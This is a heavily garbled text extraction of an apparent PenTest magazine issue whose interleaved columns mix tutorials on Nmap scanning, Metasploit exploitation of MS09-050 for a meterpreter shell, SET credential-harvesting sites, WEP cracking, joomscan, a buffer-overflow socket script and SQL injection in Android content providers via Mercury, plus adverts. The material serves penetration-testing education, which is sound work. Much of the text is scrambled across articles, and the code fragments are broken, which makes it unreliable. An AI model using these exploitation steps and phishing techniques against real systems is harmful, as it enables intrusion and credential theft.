Beruflich Dokumente
Kultur Dokumente
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
www.titania.com
With Nipper Studio penetration testers can be experts in You can customize the audit policy for your customers
every device that the software supports, giving them the specific requirements (e.g. password policy), audit the
ability to identify device, version and configuration device to that policy and then create the report detailing
specific issues without having to manually reference the issues identified. The reports can include device
multiple sources of information. With support for around specific mitigation actions and be customized with your
100 firewalls, routers, switches and other infrastructure own companies styling. Each report can then be saved
devices, you can speed up the audit process without in a variety of formats for management of the issues.
compromising the detail. Why not see for yourself, evaluate for
free at titania.com
www.titania.com
Dear PenTest Readers!
Betatesters & Proofreaders: Steven Wierckx, David Jardin, But thats not all! We have also prepared some-
Phil Patrick, Gilles Lami, L.Motz, Amit Chugh, Robin Schroeder, thing special for you: 3 articles that have never been
Jeff Smith, Sagar Rahalkar, Horace Parks, Johan Snyman, Dan
Dieterle, Julian Esteves and others. published!
Special Thanks to the Beta testers and Proofreaders who They will be appearing in our magazine until Janu-
helped us with this issue. Without their assistance there would ary, but we give you the opportunity to read the most
not be a PenTest magazine.
interesting ones now! Secure Coding, Cloud Pentest-
Senior Consultant/Publisher: Pawel Marciniak ing, Analyze and Report. Interested? Open and find
CEO: Ewa Dudzic something for yourself!
ewa.dudzic@pentestmag.com
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
DISCLAIMER!
The techniques described in our articles may only
be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.
By Hitesh Choudhary
Python programming language was gift to Web world by Gui-
do van Ros-sum. Most of the time InfoSec evangelists need to
58Android
Platform
as a PenTesting
by Raheel Ahmad
write their Proof Of Concept [POC], we need to automate our There has been enough noise in the information security indus-
attacks or customize some of our tools and these tasks can try for generally talking about awareness in the area of mobile
create a lot of headaches. applications and devices. Industry leaders including McAfee,
OWASP, Core Security & Secforce etc. have been consulting to
18Content-Based Intrusion
Detection System
By Mark Sitkowski
deliver security assessment services in the corporate sector for
mobile applications and devices but there is now enough focus
on using Android as a Penetration Testing Platform.
In his article Mark Sitkowski shares his experience about deal-
ing with intrusion detection systems, difficulties in searching
for and choosing a perfect one and provides you with a few
hints on how to write your own.
62Framework
Android Vulnerability
Analysis with Mercury
by Patrik Fehrenbach
88May
Physical Penetration Testing
Your Locality and Environment
Be the Weakest Link 112Introduction
Linux
to Unix and
92 Vulnerability Assessment
and Management: Integrated
Approach
Charles Chapman and Timothy Hoffman
Effective. Efficient. Lean and Mean. These words can all be
used to describe Sockstress: a type of Denial of Service at-
By Muhammad Saleem tack that zeroes right in via TCP to wreak havoc on large or
Vulnerability Assessment and Management is the core com- small systems.
ponent of any security program. In modern approach, to han-
dle latest security challenges and zero day attacks, we have
to think like hackers think, our approach to handle vulnerabili-
ties should be based on hackers look into vulnerabilities.
122Secure Coding in C# .NET
by Gilad Ofir
As all of us programmers go day by day, writing more and
more code, improving whats already written and developing
A
s the number of demands for penetration test- matic (point and click) is fast, it might provide false
ing engagements gets higher, so do the de- positives, and while the manual way (researching
mand for technical abilities. Clients who en- and testing item by item) can consume more time, it
gaged pentesters may also question the tools, the might be more reliable. Depending on the time con-
methodologies, the techniques, and the processes straints and the number of systems involved, pen-
used when pentesting their systems. During meet- testers have to find a way to balance both methods
ings, clients may want to ask whether the tools used in order to fulfill the requirements.
are automatic or manual. There might also be clients
who prefer pentesters to perform a manual labor The Hackers Methodology
rather than just simply point and click. Of course, both The Methodology
methods have their good and bad sides. While auto- Here, we will get through 4 phases from the Hack-
ing Methodology (Figure 1) and one phase, which
we added, called Research
Footprinting,
Scanning,
Enumeration,
Research,
Exploitation/Gaining Access.
Footprinting Phase
Footprinting is the phase of gathering information
Figure 1. The Hackers methodology about computer systems and the companies they
Scanning Phase
Scanning is the technique an attacker perform be-
fore penetrating the network. During this phase
specific vulnerabilities are to be identified and
more juicy information is to be gathered relying on
the details compiled during the footprinting stage.
As a result of the scanning phase, an attacker
can retrieve critical information, such as mapping
of systems, network devices, list of services and
open ports. All these information will then be used
for the later phase: Exploitation.
TBO 03/2013
find out whether the host is really up or down. We --osscan-guess: Perform OS scan and guessing
issue a Nmap command with the sn switch. more intrusively.
#nmap sn <target host> Note, always to use the switch n and Pn when
scanning through a huge bunch of IP addresses
On Figure 2, we can see that, although our Ping as using the switches will speed things up.
requests are being blocked, Nmap shows that the On Figure 3, we can see the output of the scan
host is up. result. It provides us with:
Figure 3. The output of the Nmap scan showing the services, Figure 4. Researching the vulnerabilities manually on the
versions and the OS details Internet
#msfconsole > search ms09_050 By default, the exploit uses RPORT (remote port)
445 of the Victims machine and LPORT (local
We will see that there are modules associated port) 4444 of the Attackers machine.
with MS09-050 and its description (Figure 6). We will then set the target by inputting the IP ad-
dress information in the RHOST field (Figure 9):
Using metasploit to check the information on the
exploit msf>set RHOST <target host>
To get more information on the module, run:
Then we set our/attacking machine as the LHOST
#msfconsole > info exploit/windows/smb/ (Figure 9):
ms09_050_smb2_negotiate_func_index
msf>set LHOST <our attacking machine IP>
This will show what kind of targets we can per-
form this exploit on, as well as a brief description Gaining Shell access (Gaining Access Phase)
of the module (Figure 7). So, when we execute >exploit and if exploitation
is successful, we will be able to get a meterpreter
Using Metasploit to set the exploit
(Exploitation Phase)
Now it is time for us to exploit the target host with the
information we gathered so far. On the metasploit
console, we will use the exploit ms09_050_smb2_
negotiate_func_index
Figure 6. Searching for the module ms09_050 to confirm if Figure 7. The ouput when checking for more information of
it is available in Metasploit the exploit module
Fadli B. Sidek
Graduated with a BSc Degree in Cy-
ber Forensics, Information Security
Management and Business Informa-
tion Systems, Fadli is a security pro-
fessional at BT Global Services, a com-
pany that offers specialized IT secu-
Figure 8. Setting up the attack config before the exploit rity services to customers worldwide.
He has over 7 years in the IT industry, dealing with op-
erations, support, engineering, consulting, and current-
ly, as ethical hacker, performing vulnerability assess-
ment and services penetration testing in domains such
Figure 9. Setting the target machine and attacking machine as Network Assessments, Wireless Assessments, Social
Engineering, Perimeter Device Assessment, and Web
App Assessments through Open Source and commer-
cial tools based on methodologies from OWASP and OS-
STMM. Fadli has also conducted trainings and speaking
at seminars on the information security for both the pri-
vate and government sectors. In his free time, Fadli con-
ducts security research and regularly update his blog fo-
Figure 10. The exploit in action. Meterpreter session is cusing on IT security http://securityg33k.blogspot.sg
created providing us a shell session of the victims machine Personal Blog
S
hortly: what is new in the list? Well... Risks tographic Storage and A9 Insufficient Transport
A2(Broken Authentication and Session Layer Protection. It cover protection of data from the
Management) and A3 (Cross-Site Scripting moment when data is send by user and stored in
(XSS)), mostly because Broken Authentication be- application, and send back to user browser. A9 Us-
come more exploited and matter of vendor protec- ing Known Vulnerable Components was previous in
tion, there is more and more authentication solu- A6 Security Misconfiguration, but as level of usage
tion on the market, where Cross-Site Scripting is of known vulnerable component increased.
more complicated to prevent. In this article I will describe how to test web applica-
Cross-Site Request Forgery (CSRF) moved from tion against A10 Unvalidated Redirects and Forwards,
A5 to A8, mostly because authors of list considered OWASP defines it : Web applications frequently redi-
that it is on the list more than 6 years and that de- rect and forward users to other pages and websites,
veloper focused enough to it. A8 Failure to Restrict and use untrusted data to determine the destination
URL Access, has changed to A7 Missing Function pages. Without proper validation, attackers can redi-
Level Access Control with motivation to cover all rect victims to phishing or malware sites, or use for-
function of access control. A6 Sensitive Data Expo- wards to access unauthorized pages.
sure was created from two risks A7 Insecure Cryp- It is one of most popular attack vector to attack
financial institutions and their transaction systems,
like e-banking. It means that an attacker can trick
Table 1. The updated owasp A10 list
A1 Injection user who think that access your web application to
A2 Broken Authentication and Session Management visit malicious content. Even experienced users can
A3 Cross-Site Scripting (XSS) be tricked with this, in phishing attacks they see only
A4 Insecure Direct Object References friendly link or attacker cover it with URL encoding.
A5 Security Misconfiguration
A6 Sensitive Data Exposure How it works
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF) One of the methods is to trick user by phishing mail
A9 Using Known Vulnerable Components with nesting attacker URL in legitimate URL
A10 Unvalidated Redirects and Forwards
http://gooddomain.com/redirect/html?q=
a d v e r i s e m e n t
Python for Coders
and Pentesters
A word that needs no introduction for InfoSec coders
T
he solution to these problems can be a sim- be a one word answer. I would suggest visiting
ple PY file. Easy to learn syntax and a huge http://www.python.org at least once.
set of third party libraries can simply solve
our problems and the best part is that python is Hardware/Software Requirements
open source. There are no hardware requirements for the inter-
preter of this language, although there are many
Target Audience software setups that you may prefer to play with.
I would like to welcome all the coders as well as A platform that I recommend most of the time is
pentesters. The welcome of coders seems to be Linux. But Windows platform will do as well. For
obvious but pentesters might be wondering about Linux users, you already are equipped with this
the reason why they are welcome. This is to en- weapon, just type python on your terminal. For
able new pentesters (particularly those who are not Windows you will need to install it manually.
considered as ninjas in coding) to learn the imple-
mentation of a various tools that are already creat- Understanding with a Real Case Study
ed. The best part is our favorite Operating System Example for Coders
(BackTrack) which is already enriched with scripts It would be very helpful for a coder to create a
written in this language. powerful web-spider with just a few lines of code.
Most of the time searching for online information
Scope about the client is painful and it would be helpful
Most of the time when I write, read or learn any for us if someone can automate this task for us.
language or technology, the very first question that Usually a few lines of code in PHP or in java can
arises in my mind is the Scope of the assets. With do it but with Python we can make it much more
my experience in Information Security, Python is easy (Listing 1).
one of the best languages for automation or for cre- Most of the code lovers will notice that the task of
ating our new tools. If you are interested in working finding links and descriptions about a web based
with Java, .net, Game Development, Web applica- application can be simplified by this fifteen line
tion development, Socket programming, scripting, script. Not only this, but also SQLmap can be add-
GUI and IT security programming, the Python can ed. Output from this script can be fed into SQLmap
Hitesh Choudhary
Hitesh Choudhary is ethical hacker from India serving
free to Rajasthan police to handle cyber crimes as well
as pursuing his wireless research at M.I.T., California. He
has completed his RHCE, RHCSA, CEH and various other
security certifications. His recent work for the code soci-
Figure 2. TheHarverster script demonstration ety can be seen at www.EduacationTube.net.
I
ts far more cost-effective to persuade the bank Easy, right? All you need to do is to buy a device
to let you have access to its database, via a which will alert you, as soon as it detects a hack at-
back door. Then, you have access to all of the tempt, and prevent it succeeding.
banks resources, for the expenditure of a mini- If, after a few weeks of searching on the internet,
mum of effort, and without even having to under- and talking to prospective suppliers, you find that
stand how the authentication system works. nothing on the market will do what you want, what
On the other side of fence, when your companys do you do?
product actually is that banks authentication sys- You write your own, of course...
tem, and which it describes as Uncrackable, you
have to expect this to be like a red rag to a bull, as Defining the problem
far as the worlds hackers are concerned. When we set up the infrastructure for our authenti-
Every day, dozens of them try to break the algo- cation servers website, we did all the right things.
rithm, but none ever succeed, so there is some ex- The only open port was port 80, there was no
cuse for the complacency which ensues. Howev- GET permission for cgi-bin, no POST permission
er, you soon notice that, for every front door attack, for htdocs, all other methods like MOVE, DELETE,
there are over a hundred attempts to totally bypass COPY etc were disabled, and there were no inter-
the authentication system, and get in via a back door. preted scripts, like those written in java, perl, shell
Now, after youve told the world that the authentica- or ruby.
tion system is uncrackable, it would be rather embar- The only HTML page was index.html, and the
rassing to find that the hackers had decided not to other sixty four pages were dynamically created
bother cracking it, but had broken into your authen- by the CGI - which was an executable, written in
tication server, instead, and hijacked your database. a compiled language. That way, if a hacker ran
You have no control over how the average bank, Wget on our site, hed have no additional clues as
securities trading company or whoever uses your to which page called which CGI, or what any of the
product, configures their online access server or HTML variables meant.
ATM machine, but you can lead by example, and Bulletproof.
make sure that your authentication server, at least, As far as it went, it certainly was. We had ma-
can be made hack-proof. ny connections each day, from the usual hopeful
D
uring this process, if security issues have BackTrack comes from the merge of two other dis-
brought to the foreground, pentesters tries tributions named WHAX and Auditor Security Col-
to exploit them. Successful penetration re- lection which already was focused on penetration
sults are presented to systems owners with recom- testing. The latest release of BackTrack was pub-
mendation to plug that loophole and all the opera- lished in August 2012 and is named BackTrack 5
tions to conduct to reproduce the attack. R3. Here's a non-exhaustive list of backtrack tools
categories:
Warning
Please consider that all materials of this Pentest Information gathering;
magazine apparition are intended for educational Vulnerability assessment;
purposes only. You must not use the skills and in- Exploitation tools;
formation obtain from this reading to attack in any Privilege escalation;
way a system for which you dont have specific Maintaining access;
authorization or ownership. Reproducing experi- Reverse Engineering;
ments that are present in this article on non-au- RFID tools;
thorized systems is illegal in most of the world and Stress testing;
you will ultimately backstop the consequencesin- Forensics;
cluding very high fine and jail. Reporting tools;
Services;
Quick overview of BackTrack Miscellaneous.
In the testing/penetration community, a leader
emerges: BackTrack. Since its first release on the Installation and Configuration
5th of February 2005 by Mati Aharoni, Devon Ke- In order to follow our step-by-step tutorials and
arns and Offensive Security; BackTrack has be- hands-on recipes, you must have an access to three
come a large, stable, and well known distribution different virtual machines: one with BackTrack, one
for penetration testing. BackTrack is a Debian with Windows 7 and later with Windows XP.
GNU/Linux based distribution built for specific pur- We consider that you have a brand new installa-
poses: digital forensics and penetration testing. tion of BackTrack. If not, you can download the lat-
ping 192.168.1.119
Figure 4. Social Engineering tool A ping is a special network packet called ICMP
request that sends an echo packet and wait for an
echo reply.
Exploit
In this case we use SET to create a fake website to
harvest credentials.
Figure 9. Reports
Where:
BSSID corresponds to the target BSSID,
filename-01.cap is the name specified during
step 6, followed with -01.cap; corresponds
to the first tracefile.
Aircrack continue to update the IVs number
captured by airodump and generated by air-
play.
After a few minutes, WEP key should appear
by itself if the crack works (see Figure 16).
Figure 17. hciconfig -a
The network has changed the key, but you should
know because you are the AP owner.
The captured file is corrupted.
Bluetooth security
There are various hacks and a lot of software al-
ready available on the different website which help
hackers to hack any cell phone and multimedia
phones with Bluetooth. But actually a lot of man-
ufacturers have close security vulnerabilities. In
this article, we have outlined only some Bluetooth
hacking software and presented how to set them.
hciconfig hci0 up
Where:
hci0 corresponds to your Bluetooth interface.
Now you should have your adapter up and
working. To verify that all is 'OK' hit this com-
mand: hciconfig -a (Figure 17). Figure 19. sdptool
Start BackTrack
Open the jomscan tools (you will find them in
BackTrack menu; see Figure 21).
To run the joomscan script use this command
(see Figure 22):
./joomscan.pl u (String)
Where:
STRING corresponds to our Joomla URL web-
site. In this example the website is placed at
192.168.1.3/joomscan/
After few seconds, we can see apache and
Joomla version analyzed by joomscan and all
included website modules. As we can see, the
mentioned version is not the same, here the
range 1.5.12-1.5.14.
We can explain fail by the techniques used Figure 22. Running Joomscan
by joomscan to analyze the version. Indeed,
joomscan analyzed the header in the .ini file in-
cluded in Joomla and sometimes is not up-to-
date. However, the analysis can help you un-
derstand security in the CMS world.
After a few minutes, Joomscan has analyzed all
vulnerabilities on your website and thought us if
our version has been concerned (see Figure 23).
Now we can follow the 'Exploit' instruction to
throw an exploit on our Joomla website.
If you would like to prevent attacks on your
Joomla website, you can hit this command: ./
Joomscan. pl defense and follow the instructions
to make your CMS more secure.
Figure 39. Use auxiliary command Figure 42. Module Execution complete
Figure 49. Remote system running processes Figure 53. Access to the remote prompt
Buffer Overflow
In this section; we will learn about an exploit relat-
ed to Buffer Overflow techniques. A buffer overflow
may appear when a program attempts to store in
RAM more data than it can actually do. Moreover,
buffers are created to hold a fixed amount of data
and will corrupt or overwrite adjacent buffer while
overflowed. Even though buffer overflow can ap-
Figure 54. OllyDBG GUI
pear while programming; in this section we will try
to exploit poor programmed program by overflow-
ing its buffer with executable code of our choice.
What you will learn:
Configuration
The target system is a Windows XP SP2 with:
Ollydbg (http://mathieu-nayrolles/pentestmag/
victim/odbg.zip). OllyDbg is an assembler lev-
el analyzing debugger for Windows XP. We will
use this software to detect buffer overflow pos-
sibilities. Figure 55. Find a JMP ESP operation
MyTarget ="1xx.xxx.xxx.x3"
Port=80
sock=socket.socket(socket.AF_INET, socket.
SOCK_STREAM)
connect=sock.connect((MyTarget, MyBuffer))
sock.send(MyBuffer)
sock.close()
Figure 56. EIP overwritten to 41414141
#!/usr/bin/python
import socket
Figure 57. ESP overwritten to Ch7Ch...
MyTarget ="1xx.xxx.xxx.x3"
Port=80
sock=socket.socket(socket.AF_INET, socket.
SOCK_STREAM)
connect=sock.connect((MyTarget, MyBuffer))
sock.send(MyBuffer)
sock.close()
Figure 58. Confirm the buffer overflow
Figure 59. Remote Prompt access Figure 60. Remote Prompt access
Benot Delorme
Benot was born in France, where he graduated at Exia
with an emphasis on Networking and System Administra-
tion in Nancy. He now lives in Montreal, Quebec, where
he's following courses to obtain a Master's degree from
the University of Quebec in Montreal. His working fields
are multi factor security authentication like fingerprints
and facial recognition and at the same time he is giving
courses on security for embedded devices in his spare
time. He likes IT security in general, web development,
particularly UX-wise, project management, his Nexus 4
phone, and preparing great meals. You can follow him on
Figure 61. Output Folder Google+ http://gplus.to/benoit.
T
he support for ARM hardware means that tools like Ghost Phisher, Arachni Scanner, Unicorn-
you can now get your hack on with devic- scan and Pass the Hash Toolkit. One of the things I
es such as EfikaMX, Beaglebone Black, noticed the most was the stability of Kali Linux when
CuBox, Samsung Galaxy Note, Samsung ARM compared to BackTrack. I personally had many sta-
Chromebook, SainSmart SS808, ODROID, and of bility issues with BackTrack where it would either
course Rasberry Pi. shut down on me, not start up, freeze, or worse,
Kali Linux comes packed with over 300 security wouldnt detect my wireless card. This would drive
tools. This includes some of the oldies, but good- me crazy and I found these issues on multiple differ-
ies like Metasploit, Aircrack-ng, Kismet, John the ent computers using different settings. I havent had
Ripper, Nmap, EtterCap, WireShark, OWASP Zed a single issue yet on Kali Linux and it always seems
Proxy and of course BeEF but also has many new to be blazing fast. I definitely find it much more sta-
ble than its predecessor (Figure 1).
Figure 1. Kali Linux Applications menu Figure 2. Logging into the Maltego Community Server
ettercap -G
Conclusion
Kali Linux has so much to offer when it comes to
tools that save you time. Ive given you some of my
favorite tools that Ive used many times when per-
forming security audits and cant possibly recom-
mend Kali Linux more to anyone interested in the
security industry. Specializing in
iOS /OS X Forensics
Paul Alkema Mobility & Security
With more than 6 years of experience Architecture
in the IT field, Paul is currently em-
Mobile Device Policy/BYOD
ployed as the Sr. Web Application De-
veloper for a large e-commerce web- Secure File Storage & Transfer
site out of South Jersey. His current /Cloud
role includes static and dynamic secu-
Open Source Integration
rity testing, documentation, applica-
tion development in C#, MVC, and oth-
er .NET languages. Paul has recent-
ly earned his GSSP in .NET and continues to grow his
knowledge in security and penetration testing on a daily
basis. In his free time, he works on miscellaneous open http://virtualnex.us/
source projects in addition to keeping up with his blog 530-304-3216
at http://paulalkema.com.
TBO 03/2013
In Depth Review of the
Kali Linux: A Hackers Bliss
Kali Linux is a blessing for Penetration Testers worldwide. It
addresses many of the shortcomings of its predecessor Backtrack
and is immensly popular with professional Hackers. Here we
discuss the (relatively) new Kali Linux in depth and explore the
qualities that make it different from Backtrack.
K
ali Linux is a Linux penetration testing and se- A Little History
curity auditing Linux distribution. After its re- To be very concise, Kali is an offshoot of Back-
lease in March 2013, Kali Linux has quickly track, which is an Offshoot of Whax, which is
become the new favorite among PenTesters world- itself an Offshoot of Whoppix, which is derived
wide as their choice for the PenTesting OS. Replacing from Knoppix. Something common among all of
its predecessor Backtrack, Kali incorporated several these distros is that they were focused on Digital
new features and looks quite promising. It is available Forensics and Intrusion Detection, with Backtrack
for i386 and amd64 architectures and has the same and Kali adding a whole lot of Tools for PenTest-
Minimum Hardware Requirements as Backtrack: 1 ing purposes. Backtrack has been giving ma-
GHz CPU, 8 GB of Hard Disk Space, 300 MB RAM, chine guns to monkeys since 2007, so it has had
And DVD-writer/Ability to boot with a Pen drive. a long reign as the favorite distro of PenTesters
worldwide. Offensive-Security, the creators of
Backtrack, decided to incorporate many changes
in new Backtrack 6 (as it was called at that time).
Since it was built from scratch, it was significantly
different from the older versions of Backtrack and
Offensive-Security decided to give a new name to
the Distro Kali Linux.
a d v e r t i s e m e n t
EMBEDDED LINUX
Design, Development, and Manufacturing
www.css-design.com
Communication Systems Solutions 6030 S. 58th St. STE C Lincoln, NE 68516 402.261.8688
How to Detect SQL
Injection Vulnerabilities in SOAP?
T
ons of articles have been written about the phases starting from the detection to the database
SQL injection vulnerability. Since 2001, re- data acquisition using the commonly available tools.
searchers all around the world have published
techniques and tools to detect and exploit them. As Application Behavior Analysis
the wise say: a fool with a tool is still a fool, and of- To start this kind of security analysis, the first step
ten the penetration tester acts like a fool relying only is setting up the right environment. In this case, the
on the automated scanning tools output to detect penetration test goal was to simulate an attack com-
SQL Injection: if no alert is thrown by the scanner, ing from the internal network. To do that, we needed
the application under review is marked as "safe". two different boxes: the first configured with the MDI
Things get worse if the application under review is application and the second with the tools we need-
not the classical Web Application: many "Security ed to perform the job. Usually during a penetration
Professionals", at least here in Italy, think that SQL test, the traffic produced between the attacking ma-
injection vulnerabilities affects only web applica- chines and the target application is monitored and
tions. So if the vulnerable application, for example, logged for assurance purposes, so in this case the
is Windows MDI based and the back end integration first box was also equipped with Wireshark to ac-
is done through SOAP Web Services, the SQL In- complish the monitoring tasks. In this kind of test
jection vulnerabilities are not considered at all. Most monitoring the network traffic is also essential to un-
of the time, SOAP Web Services are designed to derstand how the application manages the under-
integrate together remote "trusted" systems, the se- lying connection to the "data source". The testing
curity controls are poorly or not implemented, and scenario is represented in Figure 1.
an attacker can easily bypass the application logic After setting up the environment, we started run-
in order to the access the data base. ning the application while collecting traffic on the
In this article, we will talk about a real world ex- MDI interface for a few minutes. As there was no
ample, where the automated vulnerability scanner encryption over the transport layer we could easily
tools failed to detect the SQL injection vulnerabil- discover that the application was relying on SOAP
ity residing inside the SOAP web services code, in- WEB Services to expose data to the end-user. A
voked by an MDI Windows application. Particular- snippet of the SOAP communication is reported in
ly, we start describing the vulnerability exploitation Figure 2.
Listing 2. The sqlmap command line used to exploit the vulnerability and retrieve the users
F
igure 1 is based on the number of Android NIST SP800-115 technical documents fours
devices that have accessed Google Play phases penetration testing approach as shown in
within a 14-day period ending on the data Figure 2. I will not explain these phases here how-
collection date i.e. 1 November 2012. ever we will se how Android Platform fits into this.
Food for thought: Can someone use a phone to Penetration testing is highly dependent upon
hack? Imagine the crowd; every day more than 1 standardised tools. For each phase in this meth-
million new Android devices are activated world- odology you need tools to actually work for you.
wide! In one liner you need to plan youre for your job of
testing, discover your target and plan an attack.
Introduction First plan your penetration testing project and get
Before we discuss how Android can be used as a ready for action. First of all you need to know which
penetration testing platform let me quickly highlight tools you can use to actually start working with.
methodology we use for penetration testing and Now question is will Android would be able to pro-
then we see how this Android Platform easily fits vide support for actually executing the above meth-
into the methodological framework for pen testing. odology? The answer is hmm! Lets find out.
For example if you are running a network penetra-
tion test. At a high level you need vulnerability scan-
Nmap
Now it will be unfair if we havent mentioned the
great tool of all time for performing network sweeps
Conclusion
Table is turning! Canonical has already announced
that it will seamlessly integrate Android with the Linux-
based Ubuntu distribution. A device running Ubuntu
for Android loads Android during typical Smartphone
use cases, then switches to Ubuntu once its been
slid into a dock that connects to a monitor, keyboard,
and mouse. The installation basically gives you two
devices in one: an Android phone while on the go,
and a Ubuntu desktop when plugged in.
Raheel Ahmad
Raheel Ahmad, CISSP is an Information Security Consul-
tant with around 10 years of experience in Information
Figure 7. Features of Anti security and forensics.
Register before November 15, 2013 and take advantage of early bird rate.
For Sponsorship Opportunites, contact us at +971 4 884 1110
kristine.tuazon@caxtongroup.com
www.caxtongroup.com
Android Vulnerability
Analysis with Mercury Framework
D
uring the past few years, smartphones and plication explicitly requests the right to access pro-
other mobile devices have seen their com- tected resources before it may be installed. This
putational power and data connectivity rise will ensure that an application isnt able to access
to a level nearly equivalent to that available on sensitive information stored on the system or in the
desktop computers. Nowadays, users save more private space of another application and that ac-
sensitive data on their smartphones than on their cessing hardware features such as the camera or
desktop pcs. Users are now able to login to their GPS is not allowed.
email accounts, plan meetings, share thoughts Each application on the device runs under a
and even do banking transactions with their smart- seperate User ID and Group ID which means that
phones. When talking about smartphones, we are every application is isolated from one another.
looking at the devices that run operating systems There is also an option for the application to share
just like desktop pcs. different resources over the UID.
Android is an open source operating system Despite these security controls, applications can
based on a monolithic Linux based kernel with a be a serious security risk. This article will have a
layered structure of service including core native close look on Android applications, how to analyze
libraries and application frameworks. There are them and what vulnerabilites could affect user data.
currently more than two milliondownloadable ap- For analyzing applications running on Android,
plications in the central repository of Android ap- a new tool has been developed by MWR InfoS-
plications run by Google and Android applications ecurity called The Mercury Framework which of-
can also be downloaded from other third-party fers security researchers a free framework to find
sites. On the application level, each software pack- vulnerabilities, write proof-of-concept and exploits,
age is sandboxed by the kernel. In theory, even and allows dynamic analysis of Android applica-
if an application gets exploited the attacker is not tions.
able to gain access to unprivileged data. Focusing To comprehend this tutorial it is necessary to
on the Android application privileges or as in the have a basic knowledge of the Android security
unix world called the permissions is a very basic system and the functionality of well known security
and important part of the Android security model. issues like SQL injections, directory traversal or in-
Androids permission model requires that each ap- secure file permissions.
1 activities exported
0 broadcast receivers exported
0 content providers exported
0 services exported
debuggable = true
Practice
A tool for exploiting potential
SQL injections in applications is
the Software Webcontentresolv-
er, also included in the Mercury
Framework. In this test case, the
Webcontentresolver didnt work
correctly and a standalone ver-
Figure 4. Mercury Frameworks start screen sion was used.
The researcher is now able to inspect an applica- Query successful: Column count: 3 Row count: 1 |
tion from a web interface located under http://loc- _id | name | value | 5 | volume_alarm | 6
alhost:8080 (Figure 5).
To get a list of the possible content providers, click http://localhost:8080/query?a=settings&path0=sys
on the list button. The output will be a list of con- tem&selName=_id&selId=5 will demonstrate the
tent providers, their authority, if they are exported, first vulnerability:
and the read/write permissions. In this example, the
package of com.android.proviers.settings was Exception: android.database.sqlite.SQLiteException:
chosen. The authority which has the permissions unrecognized token: ): , while compiling: SELECT
to read its settings. As seen in the table, the read- * FROM system WHERE (_id=5) unrecognized token:
Perm (standing for reading permission) is set to null. ): , while compiling: SELECT * FROM system
Knowing this means that any application is able to WHERE (_id=5)
read everything within the package with the author-
ity settings without having any permission (Figure 6). To go further and actually exploit this SQL Injec-
To get a list of the possible contents within the tion vulnerability, either web application SQL In-
package, a tool called finduri can be used. The fin- jection tools can be used or it can be done man-
duri tool is targeting the com.android.providers. ually. (Manual exploitation will not be covered in
settings with the following command: this article.) The Mercury Framework includes a
module to test SQL injections.
*mercury#provider> finduri com.android.providers. The first step on Mercury is to query the content
settings of the table and then try to inject the table. This can
be done with the command:
The result gives an overview about the content:
*mercury#provider> query content://customization_
/system/app/SettingsProvider.apk: settings/SettingTable/ --projection inject
Contains no classes.dex no such column: inject: , while compiling: SELECT
true FROM SettingTable WHERE (key=)
/system/app/SettingsProvider.odex:
content://customization_settings/SettingTable/ As seen here, a typical SQL error will lead to SQL
content://media/phoneStorage/audio/artists Injection. The aim of the attacker is to force the
content://media/phoneStorage/audio/media
content://customization_settings/SettingTable/
scanner.provider.sqlinjection scanner.provider.providerscan
The first module we will be looking at is the scan- The next tool is the scanner.prover.providerscan.
ner.provider.sqlinjection. To start it, we use the This tools checks automatically to see if there are
command run scanner.provider.sqlinjection. queries in the provider section that it is able to read
This scanner will now perform a fully automated with the given permission set. Based on this data, an
search for SQL Injections and will give an output of attacker is able to gain information that might contain
the vulnerable queries as soon as it is finished. As sensitive information (Figure 10). The output tells us
seen here, two potentional queries that can be at- which content providers are currently able to query.
tempted with injection were discovered: Figure 9. For later analysis, the attacker just has to use the
query command such as the one discussed earlier in
[*] Summary the SQL Injection section and check for potentional
------- SQL Injections with the projection command.
D
ata collection and publishing are ubiqui- jects, offering tremendous opportunities for min-
tous in todays world. Many organizations ing useful knowledge. However, this trajectory
such as governmental agencies, hospi- data contains peoples visited locations and thus
tals, and nancial companies collect and dissem- reveals identiable sensitive information such as
inate various person-specic data for research social customs, religious inclination, and sexual
and business purposes. Worldwide governments preferences. Thus, data about individuals gets
systematically collect personal information about collected at various places in various ways.
their citizens through censuses. These data are This data offers tremendous opportunities for
released to public for demographic research. In mining useful information, but also threatens per-
the medical domain, gaining access to high-qual- sonal privacy. Data mining is the process of ex-
ity healthcare data is a vital requirement to in- tracting useful, interesting, and previously un-
formed decision-making for medical practitioners known information from large datasets. Due to
and researchers. Grocery stores collect a large the rapid advance in the storing, processing, and
amount of customer purchase data via store cour- networking capabilities of the computing devices;
tesy cards. These data are analyzed to model the collected data can now be easily analyzed to
customer behaviour and are used by advertise- infer valuable information for research and busi-
ment companies. In the online world, web sites ness purposes. Data from different sources can be
and service providers (Google for example) col- integrated and further analyzed to gain better in-
lect search requests of users for future analysis. sights. The success of data mining relies on the
Recent data publishing by AOL is a unique ex- availability of high quality data and effective infor-
ample of this kind [3]. Finally, the emergence of mation sharing. Since data mining is often a key
new technologies such as RFID tags, GPS-based component of many systems of business informa-
devices, and smartphones raises new privacy tion, national security, and monitoring and surveil-
concerns. These devices are used extensively in lance; the public has acquired a negative impres-
many network systems including mass transpor- sion of data mining as a technique that intrudes on
tation, car navigation, and healthcare manage- personal privacy. This lack of trust has become an
ment. The collected trajectory data captures the obstacle to the sharing of personal information for
detailed movement information of the tagged ob- the advancement of the technology.
www.forticomgroup.com
Smartphone a
Win-Win Product
for Both Consumers and Sellers
In a world where technology can be used for multiple exchanges,
the use of mobile phones is no longer limited to simple voice
communication functions. Mobiles are now providing access to a
growing number of services due to Smartphone
A
smartphone is a mobile phone built on a mo- tile functionality. The versatility and convenience
bile operating system, with more advanced of these devices makes them a priority from other
